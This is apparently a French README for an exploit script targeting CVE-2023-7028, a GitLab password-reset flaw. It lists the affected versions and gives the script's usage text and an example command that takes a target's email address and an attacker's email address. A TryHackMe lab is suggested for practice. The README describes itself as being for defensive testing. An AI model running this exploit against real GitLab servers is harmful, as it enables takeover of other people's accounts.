
Exploit pour CVE-2023-7028 - GitLab CE/EE
⚠️ Cet exploit a une finalité défensive et doit être utilisé par des professionnels de la cybersécurité pour identifier d'éventuels serveurs GitLab vulnérables.
Produits et versions concernés :
| Product | Affected Versions |
|---|---|
| GitLab Community Edition and Enterprise Edition | < 16.1.6 < 16.2.9 < 16.3.7 < 16.4.5 < 16.5.6 < 16.6.4 < 16.7.2 |
usage: CVE-2023-7028.py [-h] -u URL -t TARGET -a ATTACKER
options:
-h, --help show this help message and exit
-u URL, --url URL GitLab URL (HTTP or HTTPS)
-t TARGET, --target TARGET
Target email address
-a ATTACKER, --attacker ATTACKER
Attacker email address
Exemple : python CVE-2023-7028.py -u https://gitlab.example.com -t [email protected] -a [email protected]
Vous pouvez utiliser la salle Try Hack Me GitLab CVE-2023-7028 pour tester l'exploit, car elle exécute une version vulnérable affectée par CVE-2023-7028.
